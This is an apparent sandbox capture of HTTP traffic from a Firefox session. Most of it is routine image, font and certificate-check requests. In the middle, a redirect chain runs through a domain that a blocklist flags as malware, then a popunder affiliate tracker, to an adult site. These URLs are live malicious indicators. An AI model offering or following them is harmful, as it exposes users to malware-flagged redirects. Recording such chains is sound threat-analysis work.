content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: U0BWXH-HoAMFhkg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c4af5b-51c7abd54a523a1f479a7d5b;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 21:38:35 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: _-zkK-6DIfDVDzXmTOTigF2tM4pfh19MReGO_X26eRhLNFGL3Jc9Aw==
via: 1.1 4c48e9fb20d53d40e9fe273dbdae1098.cloudfront.net (CloudFront), 1.1 2ab6211e66998c8b58132661a7e3cade.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 21:50:29 GMT
age: 49197
etag: "604b4cc5d50ca494df1de2ab8baa486da20d1e4e"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12165
Md5:    29949330f4dc3b69747d5534e745fde3
Sha1:   604b4cc5d50ca494df1de2ab8baa486da20d1e4e
Sha256: b98faa2080573124f84254a2f87df3631f257e9a040cf34ebe267a1784d4b954
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3138a2a5-6ce8-4465-8dff-7307ebdd802f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 13276
x-amzn-requestid: 33881d12-a991-437c-90a2-4c00d31642b8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UUXHsFwoIAMFqkg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62b80564-15ff67dd1eee173c5730daf4;Sampled=0
x-amzn-remapped-date: Sun, 26 Jun 2022 07:06:12 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: jqKUpQrSzmKObwwVi8gqnNdDGPhy70oWIIQ8xtK_1BXQIBhTdB1mow==
via: 1.1 1352c0a623ff0601dd16439f3f225f70.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 04:37:49 GMT
age: 24757
etag: "7e5a550bbbac49269cae75ce9bb92e8fdf77b086"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13276
Md5:    95aa230a6b516a252f3815c586803c15
Sha1:   7e5a550bbbac49269cae75ce9bb92e8fdf77b086
Sha256: fc3c49de063a4e13c64e799664fa6c7ccf6e42aac5973aaf1af2b7689338f3b9
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0a269baa-7158-4db8-9b1d-e4e22ec22920.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 6711
x-amzn-requestid: 5b99a31c-9224-4862-a43f-544d6fa3dbdd
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: U0BHsEkmIAMFg_Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c4aefd-571078525a01c4dc72c6ed22;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 21:37:01 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 8xhNMjh4EBZQrViDk4PaxV5Tk_sBuZ1BGRuVGtAVAGie72R16hmoAA==
via: 1.1 b23fb37cd7fff033ab21e3284f558a28.cloudfront.net (CloudFront), 1.1 b36bf2c460ac693ce304817aed073112.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 21:37:02 GMT
etag: "b06f33b2742c3c6de4a449f4227d85e6268bafce"
content-type: image/jpeg
age: 50004
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6711
Md5:    d82ae97bb9569fa288a23c3380a4f4ef
Sha1:   b06f33b2742c3c6de4a449f4227d85e6268bafce
Sha256: e99961f561aaa3ded5fd1c19ce10505a7d016d5d67bbbef5caebad09ba233b56
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fabd9505b-43dd-4a15-95da-d320727bc76c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 7381
x-amzn-requestid: 7d7f3d3b-e16a-48bd-8df6-62e2eed518db
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UyBSIE-KIAMFegQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c3e273-4aac4b85691586656b440662;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 07:04:19 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: CtNsdh8vzxJbzRp4jLjErhYOyBIN8P2JOoLNgXPlVZ9N-6BJKDNRXQ==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 14:24:32 GMT
age: 75954
etag: "0e711cdffbe58041b6567ff9475af3820529038f"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7381
Md5:    a419e897adcc5361b4b5000e3f5cef87
Sha1:   0e711cdffbe58041b6567ff9475af3820529038f
Sha256: 8e0c6cecaaf6701faa8b1c2d0a925102074e5ef35b697a3f8e44c0ee75415d40
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6bb6c586-bb86-4a54-bd48-f2b5da763e74.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 7117
x-amzn-requestid: 7cfe344b-f098-4260-bb50-6574786e6ee2
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: U0BW8HnbIAMFkrA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c4af5f-14a960ac060d2d120cb0ad7c;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 21:38:39 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0F6ZVkqKywgjh9Qa1DJw_-rdOLcc1tzEll0J58NeawksoIu9nY1a-g==
via: 1.1 a20e81b65d2465c729ce2f6bfe539dd0.cloudfront.net (CloudFront), 1.1 cd64decb1403270c914848213601a674.cloudfront.net (CloudFront), 1.1 google
date: Tue, 05 Jul 2022 21:52:41 GMT
age: 49065
etag: "01efbdf6b2ab79332bf6a22d36472e294732aa17"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7117
Md5:    b4ead2bdcbc998a5685d65a26e40ce1a
Sha1:   01efbdf6b2ab79332bf6a22d36472e294732aa17
Sha256: 04399a91345db4f89bdbbb9ddb30db0f2a0c29654491b38bb1a30bd40c4f3e48
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa84f597b-27f5-4aa5-a416-9b7af03690c1.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
                                        
server: nginx
content-length: 5579
x-amzn-requestid: 1dd88ff3-004d-4979-9b03-c67dd1674eed
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: UyBktHjloAMFyag=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-62c3e2ea-774b45f11971772d475320bf;Sampled=0
x-amzn-remapped-date: Tue, 05 Jul 2022 07:06:18 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: dxvi0GoFSQVY4quJX-Ysh562fakCJnUT2ioGl3UUCYfcz-SdRNv_QA==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 ee330666adf9f04c8c30094f8ddcd004.cloudfront.net (CloudFront), 1.1 google
date: Wed, 06 Jul 2022 06:30:15 GMT
age: 18011
etag: "88adaa91cabcf87f2b679e051c1da464cb297c00"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5579
Md5:    2ef62ce237842260bf38afba9e210e79
Sha1:   88adaa91cabcf87f2b679e051c1da464cb297c00
Sha256: e00daace4e4d73799343aee18cbc8c64735221636908b8760bbc52a4d84353b0
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5613906E6F4774B30D44DFB00743812035C1C9FAB6F213A59782784A66745CEA"
Last-Modified: Tue, 05 Jul 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16943
Expires: Wed, 06 Jul 2022 16:12:50 GMT
Date: Wed, 06 Jul 2022 11:30:27 GMT
Connection: keep-alive

                                        
                                            GET /back.php?sid=6856&pid=9954&cid=347853 HTTP/1.1 
Host: find.greengoplatform.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://buyzionpark.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:27 GMT
Content-Length: 438
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   438
Md5:    367e6d8aa304997ada4b026ee48c7001
Sha1:   eb049795cf52965844d118267ea32a04494a05fb
Sha256: ab2b4c07d745efe9fa4bfc21f18e744d8b94fe55a61011cd09a7300dc6be567f
                                        
                                            GET /bb3wV.0rPO3EpFvHbWmAVTJRZTD/0Y0xN/DTcV4VOlThcA0KLvTiQV0FNrzeg/5oNXzRU- HTTP/1.1 
Host: duhestyce.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://find.greengoplatform.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         88.85.94.246
HTTP/2 302 Found
                                        
server: nginx
date: Wed, 06 Jul 2022 11:30:27 GMT
content-type: text/html;charset=UTF-8
content-length: 0
expires: Mon, 26 Jul 2011 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
accept-ch: Sec-CH-UA-Platform-Version, Sec-CH-UA-Platform
location: https://duhestyce.com/bK3LV.0MP_3OJPyQaRW-QT9UOVWWU_zYYZWaRbh-OdGeFfkgY_2iYj2kNlj-Yn3oZpDql_isOtTuIv2-Yx2yUz4AO_GCMD4EZFD-MHwIZJTKU_mMcNnONPy-YRzS1TvUd_XWQXmYcZ0-lbkcPdTeQ_0gNhzigj5-NlzmQnmod_HqZrysPtT-Avmwexmy9_uAZBUClDk-PFTGQHxIN_jKQLyMMNT-UP
referrer-policy: no-referrer
x-frame-options: DENY
x-content-type-options: nosniff
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /bK3LV.0MP_3OJPyQaRW-QT9UOVWWU_zYYZWaRbh-OdGeFfkgY_2iYj2kNlj-Yn3oZpDql_isOtTuIv2-Yx2yUz4AO_GCMD4EZFD-MHwIZJTKU_mMcNnONPy-YRzS1TvUd_XWQXmYcZ0-lbkcPdTeQ_0gNhzigj5-NlzmQnmod_HqZrysPtT-Avmwexmy9_uAZBUClDk-PFTGQHxIN_jKQLyMMNT-UP HTTP/1.1 
Host: duhestyce.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         88.85.94.246
HTTP/2 302 Found
                                        
server: nginx
date: Wed, 06 Jul 2022 11:30:27 GMT
content-type: text/html;charset=UTF-8
content-length: 0
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
accept-ch: Sec-CH-UA-Platform-Version, Sec-CH-UA-Platform
expires: Mon, 26 Jul 2011 05:00:00 GMT
referrer-policy: no-referrer
location: https://duhestyce.com/bN3OV_0.PQ3RJSyTa-WVQW9XOYW_UazbYcWdR-hfOgGhFik_Yk2lYm2nN-jpYq3rZsD_luivOwTxI-2zYA2BUC4_OEGFMG4HZ-DJMKwLZMT_UOmPcQnRN-yTYUzV1Wv_dYXZQambc-0dlekfPgT_QixjNkjlQ-ynMoTpUqm_cs0tlukvM-zx1yuzbA1_9ChDZEHFM-mHdIHJZKy_PMTNAOmPe-mR9SuTZUU_lWkXPYTZE-wbNczdce
x-content-type-options: nosniff
X-Firefox-Spdy: h2

                                        
                                            GET /aff_c?offer_id=8000&aff_id=4013&url_id=0&aff_sub5=popunder-clickunder&aff_sub=jlke15z3d0s4bv5p9wz0&aff_sub2=DZCIHGZ6R HTTP/1.1 
Host: go.trklinkcm.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         172.255.248.105
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: nginx
Date: Wed, 06 Jul 2022 11:30:27 GMT
Content-Length: 258
Connection: keep-alive
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: test=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT 8000=37_4013_8000_f510768889f57977d167c8d1e518271f; Domain=go.trklinkcm.com; Path=/; Expires=Fri, 05 Aug 2022 11:30:27 GMT op_8000=0; Domain=go.trklinkcm.com; Path=/; Expires=Fri, 05 Aug 2022 11:30:27 GMT user_id=01e8cb4e-9e63-4bb2-b981-3fc73ee58122_d01518705bd1e577c6ac98608e0877da; Domain=go.trklinkcm.com; Path=/; Expires=Mon, 05 Jul 2027 11:30:27 GMT; Secure; SameSite=None
Location: https://fuck-fantasy.com/jpt/?pub_id=4013&cid=37_4013_8000_f510768889f57977d167c8d1e518271f&source=
Vary: Accept
Cache-Control: no-store, no-cache


--- Additional Info ---
Magic:  HTML document, ASCII text, with no line terminators
Size:   258
Md5:    9fd6009eef871978d355a4f5cc365446
Sha1:   227f1e6efcd6f7746751d86411f592c28ca557ad
Sha256: c4f8481d80d8ca93eb7ca000aaba02f9cce89448e51d036fc40b6cfe2b64ab66
                                        
                                            GET /jquery-2.2.4.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://fuck-fantasy.com
Connection: keep-alive
Referer: https://fuck-fantasy.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.42
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 11:30:28 GMT
content-encoding: gzip
content-length: 29811
content-type: application/javascript; charset=utf-8
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-14e4a"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1657107028.dop020.sk1.t,1657107028.cds069.sk1.hn,1657107028.cds214.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32065)
Size:   29811
Md5:    82885772205f23cd59e25a221521b059
Sha1:   96ed36f45544295f28df1ab251e7e38faceeff0e
Sha256: 8e85465daae15b31a1837a4112cf920c1eeec7a5c189595651b3a53cb9b97215
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/archivoblack/v17/HTxqL289NzCGg4MzN6KJ7eW6CYyF_g.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://fuck-fantasy.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 18604
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 06 Jul 2022 06:19:45 GMT
expires: Thu, 06 Jul 2023 06:19:45 GMT
cache-control: public, max-age=31536000
age: 18643
last-modified: Tue, 19 Apr 2022 19:33:53 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   22284
Md5:    31ff2750d30b0161ffb2bc20f27b221c
Sha1:   3a118df1394384e5fe4e04105d80c0d315f7774d
Sha256: 88d11b6b1b1c86aa44e45be9caf77b4f8bdd4ad786f99c2cc77f096b5beb8303
                                        
                                            GET /css2?family=Archivo+Black&family=Secular+One&family=Signika+Negative&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://fuck-fantasy.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
                                        
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 06 Jul 2022 11:30:28 GMT
date: Wed, 06 Jul 2022 11:30:28 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   2523045
Md5:    3eb0076d3e8b46bb0fc6a08bd7e7625f
Sha1:   55fcd0785ef2446859c7dd28bb35cb1ff7deef67
Sha256: 0813f66e6151f41c08131510125a89c985c195cded103af315569fb9430cf3d9
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 06 Jul 2022 11:30:28 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         54.230.245.118
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Wed, 06 Jul 2022 11:30:28 GMT
Last-Modified: Wed, 06 Jul 2022 10:10:37 GMT
Server: ECS (bsa/EB23)
X-Cache: Miss from cloudfront
Via: 1.1 227a1815a1677b9cf6dd587e443000b8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: Ale1rZXnF3g5-LtkzjqTxDq97g3OKVrAyvPMJrrb0N14uXcaTTJGqg==
Age: 4791

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         54.230.245.118
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
